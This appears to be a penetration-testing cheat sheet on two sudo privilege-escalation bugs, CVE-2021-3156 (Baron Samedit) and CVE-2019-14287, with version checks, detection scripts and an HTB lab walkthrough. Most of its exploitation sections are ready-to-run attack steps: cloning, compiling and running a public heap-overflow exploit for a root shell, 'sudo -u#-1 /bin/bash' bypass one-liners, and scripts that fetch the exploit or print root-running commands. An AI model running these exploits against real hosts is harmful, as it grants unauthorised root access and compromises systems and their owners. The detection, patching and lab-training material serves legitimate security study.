# Sudo CVE Exploits

## 🎯 Overview

Two well-known sudo bugs give a local user a root shell on unpatched hosts: CVE-2021-3156 (Baron Samedit), a heap-based buffer overflow that needs no sudoers entry at all, and CVE-2019-14287, a Runas policy bypass that turns an "any user except root" rule into root. Both depend on the exact sudo build and, for the second, on the sudoers configuration, so version and policy checks come first.

## 🔥 CVE-2021-3156 (Baron Samedit)

### Vulnerability Details

* **Impact**: Heap-based buffer overflow in `set_cmnd()` → root shell; no sudoers entry is needed, any local user can trigger it
* **Root cause**: when sudo is invoked as `sudoedit -s`, the command line is not escaped but the unescaping loop in `set_cmnd()` still runs, so an argument ending in a lone backslash copies past the end of the heap buffer
* **Affected Versions**: legacy 1.8.2 through 1.8.31p2 and stable 1.9.0 through 1.9.5p1 (fixed in 1.8.32 and 1.9.5p2); builds commonly met in the wild:
  * 1.8.31 (Ubuntu 20.04)
  * 1.8.27 (Debian 10)
  * 1.9.2 (Fedora 33)
* **Existed**: introduced in July 2011 and disclosed by Qualys in January 2021, almost ten years later

### Version Check

```bash
# Check sudo version (works for any user; prints the upstream number only)
sudo -V | head -n1
# Sudo version 1.8.31

# Check OS version
cat /etc/lsb-release
# DISTRIB_RELEASE=20.04

# Caveat: distro packages keep the upstream number after backporting a fix
# (Ubuntu 20.04's patched sudo 1.8.31-1ubuntu1.2 still prints 1.8.31), so the
# number alone is a hint; the package revision or a runtime test settles it
```
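The version string is a weak signal because Ubuntu and Debian backport the fix without changing the upstream number. The test from the Qualys advisory is to run `sudoedit -s /` as an unprivileged user: a vulnerable build reaches the buggy code path and complains about the file (`sudoedit: /: not a regular file`), while a patched build refuses `-s` for sudoedit and prints a usage line. The script below is an added example, not code from the page or from any of the linked exploit repositories; it separates the output classifier from the live call so the classifier can be exercised on constructed output, and adds a package-version lookup via the standard `dpkg-query` / `rpm` query options.

```bash
#!/bin/bash
# Classify the first line printed by "sudoedit -s /" (Qualys advisory test for
# CVE-2021-3156). Vulnerable builds answer "sudoedit: /: not a regular file";
# patched builds reject -s for sudoedit and print a usage message.
classify_sudoedit_output() {
    case "$1" in
        "sudoedit: /: not a regular file"*) echo "vulnerable" ;;
        usage:*)                            echo "patched" ;;
        *)                                  echo "unknown" ;;   # e.g. "sudo: a password is required"
    esac
}

# Live test. Prints vulnerable/patched/unknown and returns 0 only when vulnerable,
# so it can be used directly as an "if" condition. No sudoers entry is required,
# which mirrors the bug's own precondition.
check_cve_2021_3156() {
    local out verdict
    if ! command -v sudoedit >/dev/null 2>&1; then
        echo "unknown"
        return 2
    fi
    # LC_ALL=C keeps the message unlocalised; stderr is merged because sudoedit
    # writes the error there; stdin is closed so it can never block on a prompt.
    out=$(LC_ALL=C sudoedit -s / 2>&1 </dev/null | head -n1)
    verdict=$(classify_sudoedit_output "$out")
    echo "$verdict"
    [ "$verdict" = "vulnerable" ]
}

# Distro package version, which (unlike "sudo -V") does change when a fix is
# backported; tries the Debian/Ubuntu database first, then RPM.
package_sudo_version() {
    dpkg-query -W -f='${Version}\n' sudo 2>/dev/null ||
    rpm -q --qf '%{VERSION}-%{RELEASE}\n' sudo 2>/dev/null
}
```

Run `check_cve_2021_3156` as the low-privileged user you hold (for example `if check_cve_2021_3156; then echo "go for Baron Samedit"; fi`); compare `package_sudo_version` with the distro advisory when the answer is `unknown`.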

### Exploitation

```bash
# 1. Download Baron Samedit exploit (needs git, gcc and make on the target,
#    or on a box running the same distro release and sudo/libc build)
git clone https://github.com/blasty/CVE-2021-3156.git
cd CVE-2021-3156

# 2. Compile exploit
make

# 3. Check available targets (hardcoded heap offsets per sudo build + libc)
./sudo-hax-me-a-sandwich
# 0) Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27
# 1) Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31
# 2) Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28

# 4. Execute with the target ID whose sudo AND libc versions match the host;
#    a mismatch corrupts the heap and crashes sudo instead of spawning a shell
./sudo-hax-me-a-sandwich 1  # For Ubuntu 20.04
# Result: root shell
```

## 🔓 CVE-2019-14287 (Sudo Policy Bypass)

### Vulnerability Details

* **Impact**: Runas restriction bypass → run a permitted command as root
* **Affected**: sudo 1.8.27 and earlier (fixed in 1.8.28, October 2019)
* **Prerequisite**: a sudoers rule that lets the user run a command as any user *except* root, e.g. `(ALL, !root)`
* **Method**: `-u#-1` (or its unsigned spelling `-u#4294967295`) passes the `!root` check because it is not UID 0, but setresuid(2) treats -1 as "leave unchanged", so the command keeps sudo's root privileges; the log records the target as user 4294967295 and PAM session modules are skipped

### Prerequisites

```bash
# Need a rule whose Runas list is "everyone except root"; a plain (ALL) rule
# already gives root without any CVE, and a rule pinned to one account
# such as (www-data) is not affected
sudo -l
# User may run: (ALL, !root) /usr/bin/id
```

### Exploitation

```bash
# Check current user ID
id
# uid=1005(user) gid=1005(user) groups=1005(user)

# Run the permitted command with the "-1" target; sudoers does not treat it as root
sudo -u#-1 id
# uid=0(root) gid=1005(user) groups=1005(user)

# Same result with the unsigned spelling of -1
sudo -u#4294967295 id

# Full root shell, if the rule permits a shell (or a binary that spawns one)
sudo -u#-1 /bin/bash
```
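The bypass only helps when the Runas list is "everyone except root": a `(ALL)` rule needs no CVE and a rule pinned to a named account never reaches the `!root` check. The script below is an added example, not code from the page or from HTB; it parses `sudo -l` output in sudo's standard `(runas) [TAG:] command` layout and prints the exact `sudo -u#-1` commands the rules allow. The sample listing is constructed for the example, not captured from a real host.

```bash
#!/bin/bash
# Constructed "sudo -l" output for this example (not captured from a real host).
SAMPLE_SUDO_L='Matching Defaults entries for htb-student on this host:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User htb-student may run the following commands on this host:
    (ALL, !root) /bin/ncdu
    (ALL : ALL, !root) NOPASSWD: /usr/bin/vim
    (www-data) /usr/bin/find
    (ALL) /usr/bin/id'

# Emit "<runas>|<command>" for every rule whose Runas spec is "any user except root".
# Those are the only rules CVE-2019-14287 upgrades: (ALL) already gives root, and a
# rule pinned to a named account such as (www-data) never reaches the !root check.
bypassable_rules() {
    printf '%s\n' "$1" |
    sed -n 's/^[[:space:]]*(\([^)]*\))[[:space:]]*\(.*\)$/\1|\2/p' |
    while IFS='|' read -r runas cmd; do
        case "$runas" in
            *ALL*!root*) printf '%s|%s\n' "$runas" "$cmd" ;;
        esac
    done
}

# Turn each bypassable rule into the command to run. "-u#-1" is the form in the
# advisory; "-u#4294967295" (the same value as an unsigned 32-bit int) also works.
bypass_commands() {
    bypassable_rules "$1" |
    while IFS='|' read -r runas cmd; do
        # drop leading tags (NOPASSWD:, SETENV:, ...) and keep only the first command
        cmd=$(printf '%s' "$cmd" | sed -E 's/^([A-Z]+:[[:space:]]*)+//; s/,.*$//')
        printf 'sudo -u#-1 %s\n' "$cmd"
    done
}
```

On a live host replace the sample with `bypass_commands "$(sudo -l 2>/dev/null)"`; each printed line is a command that runs as root on sudo 1.8.27 or older, and `/usr/bin/id` and `/usr/bin/find` are deliberately left out because their rules are not of the `!root` shape.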

### HTB Academy Lab Example (CVE-2019-14287)

```bash
# 1. Connect to target
ssh htb-student@target

# 2. Check sudo permissions
bash -i
sudo -l
# User htb-student may run the following commands:
#     (ALL, !root) /bin/ncdu

# 3. Check ncdu manual for exploitation
man -P cat ncdu | grep -A 5 "b   Spawn shell"
# Option 'b' spawns shell in current directory

# 4. Execute with negative user ID
sudo -u#-1 /bin/ncdu
# Press 'b' in ncdu interface

# 5. Get root shell and read flag
id  # uid=0(root)
cat /root/flag.txt
```

## 🔍 Version Enumeration

### Sudo Version Check

```bash
# Basic version check
sudo -V | head -n1

# Detailed version info (policy and plugin versions follow on later lines)
sudo -V | grep -E "(version|release)"

# Upstream number inside a known-affected range (a hint only: distro packages keep
# the upstream number after backporting fixes, so confirm with the package changelog
# or a runtime test before relying on it)
sudo -V | head -n1 | grep -E "1\.8\.([2-9]|[12][0-9]|3[01])(p[0-9]+)?$|1\.9\.([0-4](p[0-9]+)?|5(p1)?)$"  # CVE-2021-3156
sudo -V | head -n1 | grep -E "1\.([0-7]\.[0-9]+|8\.([0-9]|1[0-9]|2[0-7]))(p[0-9]+)?$"                 # CVE-2019-14287
```

### OS Version Correlation

```bash
# Ubuntu version
cat /etc/lsb-release
lsb_release -a

# Debian version
cat /etc/debian_version

# Generic OS info
cat /etc/os-release
```

## 🚀 Quick Exploitation

### CVE-2021-3156 Quick Check

```bash
#!/bin/bash
# The version is only a hint (distros backport without bumping the number);
# the sudoedit -s / test from the Qualys advisory is what decides.
version=$(sudo -V 2>/dev/null | head -n1 | grep -oE "[0-9]+\.[0-9]+\.[0-9]+(p[0-9]+)?")
if echo "$version" | grep -qE "^1\.8\.([2-9]|[12][0-9]|3[01])(p[0-9]+)?$|^1\.9\.([0-4](p[0-9]+)?|5(p1)?)$"; then
    echo "[?] Version in the affected range for CVE-2021-3156: $version"
fi
# Vulnerable: "sudoedit: /: not a regular file"; patched: "usage: sudoedit ..."
if LC_ALL=C sudoedit -s / 2>&1 </dev/null | grep -q "^sudoedit: /: not a regular file"; then
    echo "[!] VULNERABLE to CVE-2021-3156 (sudoedit -s / test)"
    echo "Download: https://github.com/blasty/CVE-2021-3156.git"
fi
```

### CVE-2019-14287 Quick Check

```bash
#!/bin/bash
version=$(sudo -V 2>/dev/null | head -n1 | grep -oE "[0-9]+\.[0-9]+\.[0-9]+(p[0-9]+)?")
# Exploitable only when a rule lets us run as any user except root, e.g. (ALL, !root)
rules=$(sudo -l 2>/dev/null)
if echo "$rules" | grep -qE "\([^)]*!root[^)]*\)"; then
    if echo "$version" | grep -qE "^1\.([0-7]\.[0-9]+|8\.([0-9]|1[0-9]|2[0-7]))(p[0-9]+)?$"; then
        echo "[!] VULNERABLE to CVE-2019-14287: $version"
        echo "Exploit: sudo -u#-1 <command from the !root rule>"
    fi
fi
```
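The regex checks above cannot order version numbers (`1.8.9` against `1.8.10`) and ignore the `p` patch level, which matters at the boundaries: 1.9.5p1 is affected by CVE-2021-3156 and 1.9.5p2 is the fix. This added example (not code from the page) turns a sudo version string into an integer key and compares it against the upstream affected ranges for both CVEs; it assumes the usual `X.Y.Z[pN]` layout of sudo version strings and, like every version check, reports the upstream number only, so a hit still needs confirmation on distros that backport fixes.

```bash
#!/bin/bash
# Map a sudo version string ("1.8.31p2", "1.9.5") to one integer so ranges can be
# compared numerically: major*10^8 + minor*10^6 + patch*10^3 + p-level.
# Expects the X.Y.Z[pN] layout sudo uses; missing parts count as 0.
sudo_version_key() {
    local v="$1" major minor patch plevel
    major=${v%%.*}; v=${v#*.}
    minor=${v%%.*}; v=${v#*.}
    patch=${v%%p*}
    case "$v" in *p*) plevel=${v#*p} ;; *) plevel=0 ;; esac
    echo $(( ${major:-0} * 100000000 + ${minor:-0} * 1000000 + ${patch:-0} * 1000 + ${plevel:-0} ))
}

# version_between V LO HI: true when LO <= V <= HI (inclusive)
version_between() {
    local k lo hi
    k=$(sudo_version_key "$1"); lo=$(sudo_version_key "$2"); hi=$(sudo_version_key "$3")
    [ "$k" -ge "$lo" ] && [ "$k" -le "$hi" ]
}

# version_lt V W: true when V < W
version_lt() {
    [ "$(sudo_version_key "$1")" -lt "$(sudo_version_key "$2")" ]
}

# Affected ranges from the upstream advisories. Prints the matching CVE ids, space
# separated, or nothing. Upstream number only: a distro that backported the fix
# still reports the old number, so treat a hit as "check further", not "exploit".
cves_for_sudo_version() {
    local v="$1" hits=""
    # legacy 1.8.2 .. 1.8.31p2 and stable 1.9.0 .. 1.9.5p1 (fixed in 1.8.32 / 1.9.5p2)
    if version_between "$v" 1.8.2 1.8.31p2 || version_between "$v" 1.9.0 1.9.5p1; then
        hits="$hits CVE-2021-3156"
    fi
    # everything before 1.8.28
    if version_lt "$v" 1.8.28; then
        hits="$hits CVE-2019-14287"
    fi
    echo "${hits# }"
}

# Upstream version as reported by the installed binary (first line of "sudo -V").
installed_sudo_version() {
    sudo -V 2>/dev/null | head -n1 | grep -oE '[0-9]+\.[0-9]+\.[0-9]+(p[0-9]+)?'
}
```

Usage on a host: `cves_for_sudo_version "$(installed_sudo_version)"`, which prints for example `CVE-2021-3156 CVE-2019-14287` on a stock Debian 10 sudo 1.8.27 and nothing on 1.8.32.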

## 🔧 Exploitation Scripts

### Baron Samedit Automation

```bash
#!/bin/bash
echo "=== CVE-2021-3156 BARON SAMEDIT CHECK ==="

version=$(sudo -V 2>/dev/null | head -n1 | grep -oE "[0-9]+\.[0-9]+\.[0-9]+(p[0-9]+)?")
echo "Sudo version: $version"

# Authoritative test (Qualys advisory): vulnerable builds answer
# "sudoedit: /: not a regular file", patched builds print a usage line
if LC_ALL=C sudoedit -s / 2>&1 </dev/null | grep -q "^sudoedit: /: not a regular file"; then
    echo "[!] VULNERABLE to CVE-2021-3156"

    if [ ! -d "CVE-2021-3156" ]; then
        echo "[+] Downloading exploit..."
        git clone https://github.com/blasty/CVE-2021-3156.git
        # build in a subshell so the working directory is unchanged afterwards
        (cd CVE-2021-3156 && make) || echo "[-] Build failed (gcc and make present?)"
    fi

    echo "[+] Available exploit targets (pick the one matching sudo AND libc):"
    ./CVE-2021-3156/sudo-hax-me-a-sandwich 2>/dev/null || echo "Compile first with 'make'"
else
    echo "[-] Not vulnerable to CVE-2021-3156 (sudoedit -s / test)"
fi
```

### Policy Bypass Test

```bash
#!/bin/bash
echo "=== CVE-2019-14287 POLICY BYPASS CHECK ==="

rules=$(sudo -l 2>/dev/null)
if [ -n "$rules" ]; then
    echo "[+] Sudo access available"
    version=$(sudo -V 2>/dev/null | head -n1 | grep -oE "[0-9]+\.[0-9]+\.[0-9]+(p[0-9]+)?")

    # Exploitable only with a rule like (ALL, !root): the bypass defeats "!root", nothing else
    if ! echo "$rules" | grep -qE "\([^)]*!root[^)]*\)"; then
        echo "[-] No (ALL, !root)-style rule; CVE-2019-14287 does not apply"
    elif echo "$version" | grep -qE "^1\.([0-7]\.[0-9]+|8\.([0-9]|1[0-9]|2[0-7]))(p[0-9]+)?$"; then
        echo "[!] VULNERABLE to CVE-2019-14287: $version"
        echo "[+] Candidate rules:"
        echo "$rules" | grep -E "\([^)]*!root[^)]*\)"
        echo "[+] Test with: sudo -u#-1 <permitted command>"
    else
        echo "[-] Version $version is 1.8.28 or later, not vulnerable"
    fi
else
    echo "[-] No sudo access"
fi
```

## 🔑 Quick Reference

### Immediate Checks

```bash
# Version range check (upstream number only; distro backports keep the old number)
sudo -V | head -n1 | grep -E "1\.8\.([2-9]|[12][0-9]|3[01])(p[0-9]+)?$|1\.9\.([0-4](p[0-9]+)?|5(p1)?)$"  # CVE-2021-3156
sudo -V | head -n1 | grep -E "1\.([0-7]\.[0-9]+|8\.([0-9]|1[0-9]|2[0-7]))(p[0-9]+)?$"                 # CVE-2019-14287

# Runtime check for CVE-2021-3156: "sudoedit: /: not a regular file" = vulnerable, "usage:" = patched
sudoedit -s /

# Sudo access check; CVE-2019-14287 needs a "(ALL, !root)"-style rule
sudo -l
```

### Emergency Exploitation

```bash
# CVE-2019-14287 (vulnerable version + a "(ALL, !root)" rule; use the command the rule permits)
sudo -u#-1 /bin/bash

# CVE-2021-3156 (sudoedit -s / reports "not a regular file")
git clone https://github.com/blasty/CVE-2021-3156.git
cd CVE-2021-3156 && make
./sudo-hax-me-a-sandwich 1  # Ubuntu 20.04 (sudo 1.8.31, libc 2.31); match target to the host
```

### Alternative Exploits

```bash
# Other CVE-2021-3156 exploits
# https://github.com/worawit/CVE-2021-3156
# https://github.com/stong/CVE-2021-3156

# Automated exploitation tools
# https://github.com/lockedbyte/CVE-Exploits
```

## ⚠️ Exploit Considerations

### CVE-2021-3156 Notes

* **Compilation required** on the target or on a box with the same distro release (needs gcc and make)
* **OS-specific targets** - the hardcoded heap offsets must match both the sudo build and the glibc version
* **Heap corruption** - a wrong target crashes sudo (and can leave a segfault in the kernel log) instead of giving a shell
* **No sudoers entry needed** - any local user can trigger it, which is why the bug was rated so highly
* **Detection** - `sudoedit -s /` is the reliable test; the version string alone misses backported fixes

### CVE-2019-14287 Notes

* **Simple exploitation** - one command, no compiler
* **Requires a specific rule** - a sudoers entry allowing the command as any user *except* root, e.g. `(ALL, !root)`; plain `(ALL)` needs no bypass and `(user)` rules are not affected
* **Limited reach** - sudo 1.8.27 and earlier only, and only for commands already listed in the rule
* **Noisy** - the sudo log records the target user as 4294967295 and PAM session modules are skipped
* **Fixed since 1.8.28** (October 2019), so mostly met in labs and legacy hosts

***

*Sudo CVE exploits provide direct privilege escalation on specific unpatched versions: Baron Samedit works for any local user, the policy bypass only with an "everyone except root" rule. Both are fixed upstream, so patching sudo closes them.*
